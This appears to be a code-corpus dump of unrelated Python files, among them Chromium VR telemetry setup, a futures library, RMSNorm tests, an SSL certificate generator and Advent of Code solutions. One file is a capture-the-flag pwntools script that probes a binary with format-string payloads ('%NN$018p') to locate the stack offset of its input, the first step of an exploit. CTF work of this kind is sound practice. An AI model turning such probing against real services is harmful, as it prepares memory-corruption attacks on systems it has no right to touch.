sys.stdout.write("\rGrabbing txn #%d/%d for block %d (%d/%d) ..." %
(t, len(b['transaction_hashes']), bi, blocks_grabbed + 1, full_blocks))
txns.append(get_txn(txn_hash))
blocks_grabbed += 1
# Dump the file along the way
with open("blocks.json", 'w') as f:
json.dump(blocks, f)
else:
got_tx = False
while not got_tx:
try:
tx_num = random.randrange(0, len(b['transaction_hashes']))
tx = get_txn(b['transaction_hashes'][tx_num])
tx['block_version'] = b['version']
txns.append(tx)
got_tx = True
except:
pass
print("\rblock = %d (version: %d), used txn %d" % (bi, b['version'], tx_num))
with open("txns.json", 'w') as f:
json.dump(txns, f)
|
HybridHaskellPythonCorefAnaphoraResolution/python_coreference_anaphora_resolution_server/test_client.py
|
vojkog/haskell_tutorial_cookbook_examples
| 170 |
117874
|
from __future__ import print_function
from urllib.request import Request, urlopen
import urllib
base_uri = 'http://127.0.0.1:8000?text='
def coref(text, no_detail=False):
def get_raw_data_from_web(a_uri):
req = Request(a_uri, headers={'User-Agent': 'PythonBook/1.0'})
http_response = urlopen(req)
data = http_response.read()
return data
encoded_text = urllib.parse.quote(text, safe='')
if no_detail:
z = '&no_detail=1'
else:
z = ''
raw_data = get_raw_data_from_web(base_uri + encoded_text + z)
return raw_data.decode("UTF8")
print(coref('My sister has a dog named Sam. She loves him'))
print(coref('My sister has a dog named Sam. She loves him', no_detail=True))
|
BERT_pairwise_text_classification/model/data.py
|
rheehot/nlp_implementation
| 181 |
117885
|
import pandas as pd
import torch
from torch.utils.data import Dataset
from typing import Tuple, List, Callable
class Corpus(Dataset):
"""Corpus class"""
def __init__(self, filepath: str, transform_fn: Callable[[str], List[int]]) -> None:
"""Instantiating Corpus class
Args:
filepath (str): filepath
transform_fn (Callable): a function that can act as a transformer
"""
self._corpus = pd.read_csv(filepath, sep='\t')
self._transform = transform_fn
def __len__(self) -> int:
return len(self._corpus)
def __getitem__(self, idx: int) -> Tuple[torch.Tensor, torch.Tensor]:
q1, q2, is_duplicate = self._corpus.iloc[idx].tolist()
list_of_indices, list_of_token_types = [torch.tensor(elm) for elm in self._transform(q1, q2)]
label = torch.tensor(is_duplicate)
return list_of_indices, list_of_token_types, label
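if __name__ == "__main__":
    # Smoke test; the toy TSV and whitespace tokenizer below are stand-ins for
    # the real corpus and BERT preprocessor, not part of the project itself.
    import os
    import tempfile
    toy = pd.DataFrame({"question1": ["hello world"],
                        "question2": ["hello there"],
                        "is_duplicate": [0]})
    path = os.path.join(tempfile.mkdtemp(), "toy.tsv")
    toy.to_csv(path, sep="\t", index=False)
    def toy_transform(q1, q2):
        vocab = {}
        indices = [vocab.setdefault(tok, len(vocab)) for tok in (q1 + " " + q2).split()]
        token_types = [0] * len(q1.split()) + [1] * len(q2.split())
        return indices, token_types
    indices, token_types, label = Corpus(path, toy_transform)[0]
    print(indices, token_types, label)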
|
tools/perf/contrib/vr_benchmarks/shared_android_vr_page_state.py
|
zipated/src
| 2,151 |
117977
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from core import path_util
from devil.android.sdk import intent # pylint: disable=import-error
path_util.AddAndroidPylibToPath()
from pylib.utils import shared_preference_utils
from telemetry.core import android_platform
from telemetry.core import platform
from telemetry.core import util
from telemetry.internal.platform import android_device
from telemetry.page import shared_page_state
CARDBOARD_PATH = os.path.join('chrome', 'android', 'shared_preference_files',
'test', 'vr_cardboard_skipdon_setupcomplete.json')
FAKE_TRACKER_COMPONENT = ('com.google.vr.vrcore/'
'.tracking.HeadTrackingService')
SUPPORTED_POSE_TRACKER_MODES = [
'frozen', # Static pose looking straight forward.
'sweep', # Moves head back and forth horizontally.
'rotate', # Moves head continuously in a circle.
'circle_strafe', # Moves head continuously in a circle (also changes
# position if 6DoF supported?).
'motion_sickness', # Moves head in a sort of figure-eight pattern.
]
SUPPORTED_POSE_TRACKER_TYPES = [
'sensor', # Standard sensor-fusion-based pose tracker.
'tango', # Tango-based pose tracker.
'platform', # ?
'fake', # Fake pose tracker that can provide pre-defined pose sets.
]
class SharedAndroidVrPageState(shared_page_state.SharedPageState):
"""SharedPageState for VR Telemetry tests.
Performs the same functionality as SharedPageState, but with three main
differences:
1. It is currently restricted to Android
2. It performs VR-specific setup such as installing and configuring
additional APKs that are necessary for testing
3. It cycles the screen off then on before each story, similar to how
AndroidScreenRestorationSharedState ensures that the screen is on. See
_CycleScreen() for an explanation on the reasoning behind this.
"""
def __init__(self, test, finder_options, story_set):
# TODO(bsheedy): See about making this a cross-platform SharedVrPageState -
# Seems like we should be able to use SharedPageState's default platform
# property instead of specifying AndroidPlatform, and then just perform
# different setup based off the platform type
device = android_device.GetDevice(finder_options)
assert device, 'Android device is required for this story'
self._platform = platform.GetPlatformForDevice(device, finder_options)
assert self._platform, 'Unable to create Android platform'
assert isinstance(self._platform, android_platform.AndroidPlatform)
super(SharedAndroidVrPageState, self).__init__(test, finder_options,
story_set)
self._story_set = story_set
# Optimization so we're not doing redundant service starts before every
# story.
self._did_set_tracker = False
self._PerformAndroidVrSetup()
def _PerformAndroidVrSetup(self):
self._InstallVrCore()
self._ConfigureVrCore(os.path.join(path_util.GetChromiumSrcDir(),
self._finder_options.shared_prefs_file))
self._InstallNfcApk()
self._InstallKeyboardApk()
def _InstallVrCore(self):
"""Installs the VrCore APK."""
# TODO(bsheedy): Add support for temporarily replacing it if it's still
# installed as a system app on the test device
self._platform.InstallApplication(
os.path.join(path_util.GetChromiumSrcDir(), 'third_party',
'gvr-android-sdk', 'test-apks', 'vr_services',
'vr_services_current.apk'))
def _ConfigureVrCore(self, filepath):
"""Configures VrCore using the provided settings file."""
settings = shared_preference_utils.ExtractSettingsFromJson(filepath)
for setting in settings:
shared_pref = self._platform.GetSharedPrefs(
setting['package'], setting['filename'],
use_encrypted_path=setting.get('supports_encrypted_path', False))
shared_preference_utils.ApplySharedPreferenceSetting(
shared_pref, setting)
def _InstallNfcApk(self):
"""Installs the APK that allows VR tests to simulate a headset NFC scan."""
chromium_root = path_util.GetChromiumSrcDir()
    # Find the most recently built APK
candidate_apks = []
for build_path in util.GetBuildDirectories(chromium_root):
apk_path = os.path.join(build_path, 'apks', 'VrNfcSimulator.apk')
if os.path.exists(apk_path):
last_changed = os.path.getmtime(apk_path)
candidate_apks.append((last_changed, apk_path))
if not candidate_apks:
raise RuntimeError(
'Could not find VrNfcSimulator.apk in a build output directory')
newest_apk_path = sorted(candidate_apks)[-1][1]
self._platform.InstallApplication(
os.path.join(chromium_root, newest_apk_path))
def _InstallKeyboardApk(self):
"""Installs the VR Keyboard APK."""
self._platform.InstallApplication(
os.path.join(path_util.GetChromiumSrcDir(), 'third_party',
'gvr-android-sdk', 'test-apks', 'vr_keyboard',
'vr_keyboard_current.apk'))
def _SetFakePoseTrackerIfNotSet(self):
if self._story_set.use_fake_pose_tracker and not self._did_set_tracker:
self.SetPoseTrackerType('fake')
self.SetPoseTrackerMode('sweep')
self._did_set_tracker = True
def SetPoseTrackerType(self, tracker_type):
"""Sets the VrCore pose tracker to the given type.
Only works if VrCore has been configured to use the VrCore-side tracker
by setting EnableVrCoreHeadTracking to true. This setting persists between
VR sessions and Chrome restarts.
Args:
tracker_type: A string corresponding to the tracker type to set.
Raises:
RuntimeError if the given |tracker_type| is not in the supported list.
"""
if tracker_type not in SUPPORTED_POSE_TRACKER_TYPES:
raise RuntimeError('Given tracker %s is not supported.' % tracker_type)
self.platform.StartAndroidService(start_intent=intent.Intent(
action='com.google.vr.vrcore.SET_TRACKER_TYPE',
component=FAKE_TRACKER_COMPONENT,
extras={'com.google.vr.vrcore.TRACKER_TYPE': tracker_type}))
def SetPoseTrackerMode(self, tracker_mode):
"""Sets the fake VrCore pose tracker to provide poses in the given mode.
Only works after SetPoseTrackerType has been set to 'fake'. This setting
persists between VR sessions and Chrome restarts.
Args:
tracker_mode: A string corresponding to the tracker mode to set.
Raises:
RuntimeError if the given |tracker_mode| is not in the supported list.
"""
if tracker_mode not in SUPPORTED_POSE_TRACKER_MODES:
raise RuntimeError('Given mode %s is not supported.' % tracker_mode)
self.platform.StartAndroidService(start_intent=intent.Intent(
action='com.google.vr.vrcore.SET_FAKE_TRACKER_MODE',
component=FAKE_TRACKER_COMPONENT,
extras={'com.google.vr.vrcore.FAKE_TRACKER_MODE': tracker_mode}))
def WillRunStory(self, page):
super(SharedAndroidVrPageState, self).WillRunStory(page)
if not self._finder_options.disable_screen_reset:
self._CycleScreen()
self._SetFakePoseTrackerIfNotSet()
def TearDownState(self):
super(SharedAndroidVrPageState, self).TearDownState()
# Reset the tracker type to use the actual sensor if it's been changed. When
# run on the bots, this shouldn't matter since the service will be killed
# during the automatic restart, but this could persist when run locally.
if self._did_set_tracker:
self.SetPoseTrackerType('sensor')
# Re-apply Cardboard as the viewer to leave the device in a consistent
# state after a benchmark run
# TODO(bsheedy): Remove this after crbug.com/772969 is fixed
self._ConfigureVrCore(os.path.join(path_util.GetChromiumSrcDir(),
CARDBOARD_PATH))
def _CycleScreen(self):
"""Cycles the screen off then on.
This is because VR test devices are set to have normal screen brightness and
automatically turn off after several minutes instead of the usual approach
of having the screen always on at minimum brightness. This is due to the
motion-to-photon latency test being sensitive to screen brightness, and min
brightness does not work well for it.
Simply using TurnScreenOn does not actually reset the timer for turning off
the screen, so instead cycle the screen to refresh it periodically.
"""
self.platform.android_action_runner.TurnScreenOff()
self.platform.android_action_runner.TurnScreenOn()
@property
def platform(self):
return self._platform
@property
def recording_wpr(self):
return self._finder_options.recording_wpr
|
recipes/Python/87369_Priority_Queue/recipe-87369.py
|
tdiprima/code
| 2,023 |
117997
|
import Queue
class PriorityQueue(Queue.Queue):
def _put(self, item):
data, priority = item
self._insort_right((priority, data))
def _get(self):
return self.queue.pop(0)[1]
def _insort_right(self, x):
"""Insert item x in list, and keep it sorted assuming a is sorted.
If x is already in list, insert it to the right of the rightmost x.
"""
a = self.queue
lo = 0
hi = len(a)
while lo < hi:
mid = (lo+hi)/2
if x[0] < a[mid][0]: hi = mid
else: lo = mid+1
a.insert(lo, x)
def test():
pq = PriorityQueue()
pq.put(('b', 1))
pq.put(('a', 1))
pq.put(('c', 1))
pq.put(('z', 0))
pq.put(('d', 2))
while not pq.empty():
print pq.get(),
test() # prints z b a c d
|
client/verta/verta/_swagger/_public/uac/model/UacAction.py
|
CaptEmulation/modeldb
| 835 |
118087
|
# THIS FILE IS AUTO-GENERATED. DO NOT EDIT
from verta._swagger.base_type import BaseType
class UacAction(BaseType):
def __init__(self, service=None, role_service_action=None, authz_service_action=None, modeldb_service_action=None):
required = {
"service": False,
"role_service_action": False,
"authz_service_action": False,
"modeldb_service_action": False,
}
self.service = service
self.role_service_action = role_service_action
self.authz_service_action = authz_service_action
self.modeldb_service_action = modeldb_service_action
for k, v in required.items():
if self[k] is None and v:
raise ValueError('attribute {} is required'.format(k))
@staticmethod
def from_json(d):
from .ServiceEnumService import ServiceEnumService
from .RoleActionEnumRoleServiceActions import RoleActionEnumRoleServiceActions
from .AuthzActionEnumAuthzServiceActions import AuthzActionEnumAuthzServiceActions
from .ModelDBActionEnumModelDBServiceActions import ModelDBActionEnumModelDBServiceActions
tmp = d.get('service', None)
if tmp is not None:
d['service'] = ServiceEnumService.from_json(tmp)
tmp = d.get('role_service_action', None)
if tmp is not None:
d['role_service_action'] = RoleActionEnumRoleServiceActions.from_json(tmp)
tmp = d.get('authz_service_action', None)
if tmp is not None:
d['authz_service_action'] = AuthzActionEnumAuthzServiceActions.from_json(tmp)
tmp = d.get('modeldb_service_action', None)
if tmp is not None:
d['modeldb_service_action'] = ModelDBActionEnumModelDBServiceActions.from_json(tmp)
return UacAction(**d)
|
chrome/common/extensions/docs/server2/future.py
|
kjthegod/chromium
| 2,151 |
118089
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import sys
import traceback
_no_value = object()
def _DefaultErrorHandler(error):
raise error
def All(futures, except_pass=None, except_pass_log=False):
'''Creates a Future which returns a list of results from each Future in
|futures|.
If any Future raises an error other than those in |except_pass| the returned
Future will raise as well.
If any Future raises an error in |except_pass| then None will be inserted as
its result. If |except_pass_log| is True then the exception will be logged.
'''
def resolve():
resolved = []
for f in futures:
try:
resolved.append(f.Get())
# "except None" will simply not catch any errors.
except except_pass:
if except_pass_log:
logging.error(traceback.format_exc())
resolved.append(None)
pass
return resolved
return Future(callback=resolve)
def Race(futures, except_pass=None, default=_no_value):
'''Returns a Future which resolves to the first Future in |futures| that
either succeeds or throws an error apart from those in |except_pass|.
If all Futures throw errors in |except_pass| then |default| is returned,
if specified. If |default| is not specified then one of the passed errors
will be re-thrown, for a nice stack trace.
'''
def resolve():
first_future = None
for future in futures:
if first_future is None:
first_future = future
try:
return future.Get()
# "except None" will simply not catch any errors.
except except_pass:
pass
if default is not _no_value:
return default
# Everything failed and there is no default value, propagate the first
# error even though it was caught by |except_pass|.
return first_future.Get()
return Future(callback=resolve)
class Future(object):
'''Stores a value, error, or callback to be used later.
'''
def __init__(self, value=_no_value, callback=None, exc_info=None):
self._value = value
self._callback = callback
self._exc_info = exc_info
if (self._value is _no_value and
self._callback is None and
self._exc_info is None):
raise ValueError('Must have either a value, error, or callback.')
def Then(self, callback, error_handler=_DefaultErrorHandler):
'''Creates and returns a future that runs |callback| on the value of this
future, or runs optional |error_handler| if resolving this future results in
an exception.
If |callback| returns a non-Future value then the returned Future will
resolve to that value.
If |callback| returns a Future then it gets chained to the current Future.
This means that the returned Future will resolve to *that* Future's value.
This behaviour is transitive.
For example,
def fortytwo():
return Future(value=42)
def inc(x):
return x + 1
def inc_future(x):
return Future(value=x + 1)
fortytwo().Then(inc).Get() ==> 43
fortytwo().Then(inc_future).Get() ==> 43
fortytwo().Then(inc_future).Then(inc_future).Get() ==> 44
'''
def then():
val = None
try:
val = self.Get()
except Exception as e:
val = error_handler(e)
else:
val = callback(val)
return val.Get() if isinstance(val, Future) else val
return Future(callback=then)
def Get(self):
'''Gets the stored value, error, or callback contents.
'''
if self._value is not _no_value:
return self._value
if self._exc_info is not None:
self._Raise()
try:
self._value = self._callback()
return self._value
except:
self._exc_info = sys.exc_info()
self._Raise()
def _Raise(self):
exc_info = self._exc_info
raise exc_info[0], exc_info[1], exc_info[2]
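if __name__ == '__main__':
  # Tiny illustration (not in the original Chromium file): callbacks run
  # lazily on the first Get() and can be chained with Then().
  doubled = Future(value=21).Then(lambda x: x * 2)
  assert doubled.Get() == 42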
|
hsctf7/got_it/base.py
|
nhtri2003gmail/ctf-write-ups
| 101 |
118104
|
#!/usr/bin/python3
from pwn import *
def scanit(t):
p = process('./got_it')
#p = remote('pwn.hsctf.com', 5004)
p.recvuntil('Give me sumpfink to help me out!\n')
p.sendline(t)
_ = p.recvuntil('worked').split()[-2].split(b'"')[1]
p.close()
return _
for i in range(1,20):
t = '%' + str(i).rjust(2,'0') + '$018p'
_ = scanit(t)
print(i,_)
if _.find(b'0x') >= 0:
s = bytes.fromhex(_[2:].decode())[::-1]
if s == t.encode():
print('base:',i)
break
|
Dragon/python/dragon/tools/summary_writer.py
|
neopenx/Dragon
| 212 |
118113
|
# --------------------------------------------------------
# Dragon
# Copyright(c) 2017 SeetaTech
# Written by <NAME>
# --------------------------------------------------------
from dragon.core.tensor import Tensor
import dragon.core.workspace as ws
import os
class ScalarSummary(object):
"""Write scalar summary.
Examples
--------
>>> sw = ScalarSummary(log_dir='logs')
>>> sw.add_summary(('loss', 2.333), 0)
"""
def __init__(self, log_dir='logs'):
"""Construct a ScalarSummary writer.
Parameters
----------
log_dir : str
The root folder of logs.
Returns
-------
ScalarSummary
The scalar writer.
"""
self.log_dir = os.path.join(log_dir, 'scalar')
if not os.path.exists(self.log_dir): os.makedirs(self.log_dir)
def add_summary(self, scalar, global_step):
"""Add a summary.
Parameters
----------
scalar : tuple or Tensor
The scalar.
global_step : int
The time step of this summary.
Returns
-------
None
"""
if isinstance(scalar, Tensor):
key, value = scalar.name, ws.FetchTensor(scalar)[0]
elif isinstance(scalar, tuple): key, value = scalar
else: raise TypeError()
key = key.replace('/', '_')
with open(os.path.join(self.log_dir, key + '.txt'), 'a') as f:
f.write(str(global_step) + ' ' + str(value) + '\n')
|
thingsboard_gateway/connectors/rest/ssl_generator.py
|
ferguscan/thingsboard-gateway
| 1,123 |
118117
|
import datetime
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
try:
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
except ImportError:
print("Requests library not found - installing...")
TBUtility.install_package("cryptography")
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
class SSLGenerator:
def __init__(self, hostname):
self.hostname: str = hostname
def generate_certificate(self):
key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend(),
)
with open("domain_srv.key", "wb") as f:
f.write(key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption(),
))
subject = issuer = x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"CA"),
x509.NameAttribute(NameOID.LOCALITY_NAME, u"locality"),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"A place"),
x509.NameAttribute(NameOID.COMMON_NAME, self.hostname),
])
cert = x509.CertificateBuilder().subject_name(
subject
).issuer_name(
issuer
).public_key(
key.public_key()
).serial_number(
x509.random_serial_number()
).not_valid_before(
datetime.datetime.utcnow()
).not_valid_after(
datetime.datetime.utcnow() + datetime.timedelta(days=365)
).add_extension(
x509.SubjectAlternativeName([
x509.DNSName(u"localhost"),
x509.DNSName(self.hostname),
x509.DNSName(u"127.0.0.1")]),
critical=False,
).sign(key, hashes.SHA256(), default_backend())
with open("domain_srv.crt", "wb") as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
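if __name__ == '__main__':
    # Minimal usage sketch (not part of the gateway): writes a self-signed
    # certificate and key for the given hostname into the working directory.
    SSLGenerator("localhost").generate_certificate()
    print("wrote domain_srv.key and domain_srv.crt")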
|
users/token_api.py
|
Jordzman/explorer
| 917 |
118156
|
import requests
import json
from tokens.settings import BLOCKCYPHER_API_KEY
def register_new_token(email, new_token, first=None, last=None):
assert new_token and email
    post_params = {
        "first": first,
        "last": last,
        "email": email,
        "token": new_token,
    }
url = 'https://api.blockcypher.com/v1/tokens'
get_params = {'token': BLOCKCYPHER_API_KEY}
r = requests.post(url, data=json.dumps(post_params), params=get_params,
verify=True, timeout=20)
assert 'error' not in json.loads(r.text)
return new_token
|
tests/torch/_C/csrc/test_fused_layer_norm_rms.py
|
lipovsek/oslo
| 249 |
118158
|
# from oslo.torch._C import FusedLayerNormBinder
import torch
import unittest
import itertools
import oslo.torch.nn as onn
class TestFusedRMSNorm(unittest.TestCase):
dtype = torch.float
elementwise_affine = False
normalized_shape = [32, 16]
rtol, atol = None, None
fwd_thresholds = dict(rtol=None, atol=None)
bwd_thresholds = dict(rtol=None, atol=None)
mixed_fused = False
def setUp(self):
# bias and weight are set to 0 and 1 respectively, so no need to copy parameters from cpu module to the gpu one
if not self.mixed_fused:
self.module_cpu_ = onn.FusedRMSNorm(
normalized_shape=self.normalized_shape,
elementwise_affine=self.elementwise_affine,
).cpu()
self.module_cuda_ = onn.FusedRMSNorm(
normalized_shape=self.normalized_shape,
elementwise_affine=self.elementwise_affine,
).to(device="cuda", dtype=self.dtype)
else:
assert self.elementwise_affine
self.module_cpu_ = onn.MixedFusedRMSNorm(
normalized_shape=self.normalized_shape
).cpu()
self.module_cuda_ = onn.MixedFusedRMSNorm(
normalized_shape=self.normalized_shape
).to(device="cuda", dtype=self.dtype)
def _check_same_output(self, batch_size, contiguous):
torch.cuda.manual_seed(42)
if contiguous:
input_shape = [batch_size] + self.normalized_shape
input_ = torch.randn(input_shape, device="cpu").requires_grad_(True)
input_cuda_ = (
input_.to(device="cuda", dtype=self.dtype).detach().requires_grad_(True)
)
self.assertTrue(input_.is_contiguous())
self.assertTrue(input_cuda_.is_contiguous())
else:
input_shape = [batch_size] + self.normalized_shape
input_shape = [batch_size * 3] + [
self.normalized_shape[0] * 5,
self.normalized_shape[1] * 3,
]
input_src_ = torch.randn(input_shape, device="cpu")
            input_ = input_src_[::3, ::5, ::3].detach().requires_grad_(True)
            input_cuda_ = (
                input_src_.to(device="cuda", dtype=self.dtype)[::3, ::5, ::3]
.detach()
.requires_grad_(True)
)
# make sure that tensors are NOT contiguous.
self.assertFalse(input_.is_contiguous())
self.assertFalse(input_cuda_.is_contiguous())
out_cpu_ = self.module_cpu_(input_)
gO = torch.rand_like(out_cpu_)
out_cpu_.backward(gO)
out_cuda_ = self.module_cuda_(input_cuda_)
# TODO (mkozuki): `torch.testing.assert_allclose` is deprecated.
# Use `torch.testing.assert_close`.
# See https://github.com/pytorch/pytorch/issues/61844
torch.testing.assert_allclose(
out_cpu_.to(device="cuda", dtype=self.dtype),
out_cuda_.clone().detach(),
**self.fwd_thresholds,
)
gO = gO.to(device="cuda", dtype=self.dtype)
out_cuda_.backward(gO)
self.assertFalse(out_cpu_.is_cuda)
self.assertTrue(out_cuda_.is_cuda)
torch.testing.assert_allclose(
input_.grad.to(device="cuda", dtype=self.dtype),
input_cuda_.grad,
**self.bwd_thresholds,
)
if self.elementwise_affine:
torch.testing.assert_allclose(
self.module_cpu_.weight.grad.to(device="cuda", dtype=self.dtype),
self.module_cuda_.weight.grad,
**self.bwd_thresholds,
)
def _test_same_output(self, batch_size):
for contiguous in (True, False):
with self.subTest(contiguous=contiguous):
self._check_same_output(batch_size, contiguous)
def test_layer_norm(self):
self._test_same_output(16)
def test_large_batch(self):
self._test_same_output(65536)
class TestFusedRMSNormElemWise(TestFusedRMSNorm):
bwd_thresholds = dict(rtol=2e-3, atol=2e-4)
elementwise_affine = True
class TestMixedFusedRMSNormElemWise(TestFusedRMSNorm):
bwd_thresholds = dict(rtol=2e-3, atol=2e-4)
elementwise_affine = True
mixed_fused = True
class TestFusedRMSNormElemWiseHalf(TestFusedRMSNormElemWise):
dtype = torch.half
bwd_thresholds = dict(rtol=1.6e-2, atol=3e-3)
def test_large_batch(self):
self.skipTest("Skip to save time")
if __name__ == "__main__":
unittest.main(verbosity=True)
|
packages/core/minos-microservice-saga/minos/saga/executions/repositories/database/impl.py
|
minos-framework/minos-python
| 247 |
118166
|
<gh_stars>100-1000
from __future__ import (
annotations,
)
from typing import (
Optional,
)
from uuid import (
UUID,
)
from minos.common import (
DatabaseMixin,
ProgrammingException,
)
from ....exceptions import (
SagaExecutionNotFoundException,
)
from ...saga import (
SagaExecution,
)
from ..abc import (
SagaExecutionRepository,
)
from .factories import (
SagaExecutionDatabaseOperationFactory,
)
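# The repository below persists saga executions by delegating every store/delete/load to a
# database-specific operation factory, so the same class works with any backend that provides
# a SagaExecutionDatabaseOperationFactory.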
class DatabaseSagaExecutionRepository(SagaExecutionRepository, DatabaseMixin[SagaExecutionDatabaseOperationFactory]):
"""Saga Execution Storage class."""
def __init__(self, *args, database_key: Optional[tuple[str]] = None, **kwargs):
if database_key is None:
database_key = ("saga",)
super().__init__(*args, database_key=database_key, **kwargs)
async def _store(self, execution: SagaExecution) -> None:
operation = self.database_operation_factory.build_store(**execution.raw)
await self.execute_on_database(operation)
async def _delete(self, uuid: UUID) -> None:
operation = self.database_operation_factory.build_delete(uuid)
await self.execute_on_database(operation)
async def _load(self, uuid: UUID) -> SagaExecution:
operation = self.database_operation_factory.build_load(uuid)
try:
value = await self.execute_on_database_and_fetch_one(operation)
except ProgrammingException:
raise SagaExecutionNotFoundException(f"The execution identified by {uuid} was not found.")
execution = SagaExecution.from_raw(value)
return execution
|
scripts/listen_input.py
|
Dobbie03/orw
| 204 |
118175
|
#!/usr/bin/env python
from pynput.keyboard import Key, Listener
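# Block until the Enter key is pressed: returning False from on_press stops the listener, so the script exits.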
def on_press(key):
if key == Key.enter:
return False
with Listener(on_press=on_press) as listener:
listener.join()
|
2021/day_11.py
|
salt-die/Advent-of-Code
| 105 |
118229
|
<reponame>salt-die/Advent-of-Code
from itertools import count
import numpy as np
from scipy.ndimage import convolve
import aoc_helper
OCTOPI = aoc_helper.utils.int_grid(aoc_helper.day(11))
KERNEL = np.ones((3, 3), dtype=int)
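# Convolving the boolean flash mask with this 3x3 kernel of ones adds +1 energy to every cell in a
# flasher's neighbourhood (itself included); cells already in `flashed` cannot flash again and are
# reset to 0 at the end of the step.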
def step(octos):
octos += 1
flashed = np.zeros_like(octos, dtype=bool)
while (flashing := ((octos > 9) & ~flashed)).any():
octos += convolve(flashing.astype(int), KERNEL, mode="constant")
flashed |= flashing
octos[flashed] = 0
return flashed.sum()
def part_one():
octos = OCTOPI.copy()
return sum(step(octos) for _ in range(100))
def part_two():
octos = OCTOPI.copy()
for i in count():
if (octos == 0).all():
return i
step(octos)
aoc_helper.submit(11, part_one)
aoc_helper.submit(11, part_two)
|
tools/ops/test_policylambda.py
|
al3pht/cloud-custodian
| 2,415 |
118231
|
<reponame>al3pht/cloud-custodian
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
import jmespath
from c7n.config import Config
from c7n.loader import PolicyLoader
from policylambda import dispatch_render
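# These tests check that dispatch_render() expands a single Custodian policy into the expected SAM
# resources for the config-rule, cloudtrail and periodic execution modes.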
def test_config_rule_policy():
collection = PolicyLoader(Config.empty()).load_data(
{'policies': [{
'name': 'check-ec2',
'resource': 'ec2',
'mode': {
'type': 'config-rule'}}]},
file_uri=":mem:")
sam = {'Resources': {}}
p = list(collection).pop()
dispatch_render(p, sam)
assert set(sam['Resources']) == set((
'CheckEc2', 'CheckEc2ConfigRule', 'CheckEc2InvokePermission'))
assert jmespath.search(
'Resources.CheckEc2ConfigRule.Properties.Source.SourceIdentifier',
sam) == {'Fn::GetAtt': 'CheckEc2' + '.Arn'}
def test_cloudtrail_policy():
collection = PolicyLoader(Config.empty()).load_data(
{'policies': [{
'name': 'check-ec2',
'resource': 'ec2',
'mode': {
'type': 'cloudtrail',
'events': ['RunInstances']}}]},
file_uri=":mem:")
sam = {'Resources': {}}
p = list(collection).pop()
dispatch_render(p, sam)
assert sam['Resources']['CheckEc2']['Properties']['Events'] == {
'PolicyTriggerA': {
'Properties': {
'Pattern': {
'detail': {
'eventName': ['RunInstances'],
'eventSource': ['ec2.amazonaws.com']},
'detail-type': [
'AWS API Call via CloudTrail']}},
'Type': 'CloudWatchEvent'}
}
def test_periodic_policy():
collection = PolicyLoader(Config.empty()).load_data(
{'policies': [{
'name': 'check-ec2',
'resource': 'ec2',
'mode': {
'schedule': 'rate(1 hour)',
'type': 'periodic'}}]},
file_uri=":mem:")
sam = {'Resources': {}}
p = list(collection).pop()
dispatch_render(p, sam)
assert sam['Resources']['CheckEc2']['Properties']['Events'] == {
'PolicySchedule': {
'Type': 'Schedule',
'Properties': {
'Schedule': 'rate(1 hour)'
}
}
}
|
pylama/libs/__init__.py
|
rzuckerm/pylama
| 463 |
118266
|
<reponame>rzuckerm/pylama
""" Support libs. """
|
instances/migrations/0002_permissionset.py
|
NGXTDN/webvirtcloud
| 1,246 |
118288
|
# Generated by Django 2.2.12 on 2020-05-27 07:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('instances', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='PermissionSet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'permissions': (('clone_instances', 'Can clone instances'),),
'managed': False,
'default_permissions': (),
},
),
]
|
LeetCode/python3/213.py
|
ZintrulCre/LeetCode_Archiver
| 279 |
118292
|
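# House Robber II: the houses form a circle, so the answer is the better of robbing houses 0..n-2 or
# houses 1..n-1; Rob() solves the linear sub-problem on the half-open range [m, n).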
from typing import List
class Solution:
def Rob(self, nums, m, n) -> int:
prev, curr = nums[m], max(nums[m], nums[m + 1])
for i in range(m + 2, n):
prev, curr = curr, max(prev + nums[i], curr)
return curr
def rob(self, nums: List[int]) -> int:
if len(nums) == 0:
return 0
elif len(nums) <= 2:
return max(nums)
return max(self.Rob(nums, 0, len(nums) - 1), self.Rob(nums, 1, len(nums)))
|
exceptions/intro_objects.py
|
hugmyndakassi/hvmi
| 677 |
118300
|
#
# Copyright (c) 2020 Bitdefender
# SPDX-License-Identifier: Apache-2.0
#
import struct
import re
from abc import ABCMeta, abstractmethod
import excfg
import crc32
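# excfg and crc32 are project-local helpers: excfg exposes the values parsed from the exceptions
# config, while crc32 computes the CRC32 hashes used for every name field below.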
# Note: We cannot use os.path here since it's os specific and we must be able to run
# this both on windows & linux
DEFAULT_FLAGS = {
"SignatureFlags": "32 64",
"UserExceptionFlags": "32 64",
"KernelExceptionFlags": "32 64",
"HeaderMagic": 0x414E5845, # 'EXNA'
}
IMAGE_BASE_NAME_LEN = 14
LIX_COMM_LEN = 15
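# Maximum name lengths used when hashing truncated image/process names (see the 'trim' parameter of get_binary_name below).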
SIG_IDS = dict()
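# Maps textual signature ids to the unique numeric ids handed out by get_sig_id(); the signature type
# is encoded in the id's upper bits (sig_type << 22).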
def is_path(name):
""" Returns True if the given name is a path. Does not validate if the path
is correct except basic invalid characters. """
if name is None or len(name) < 3:
return False
# if ('"' in name) or ('<' in name) or ('>' in name) or \
# ('|' in name) or ('*' in name):
# return False
if name.startswith("\\") or name.startswith("/"):
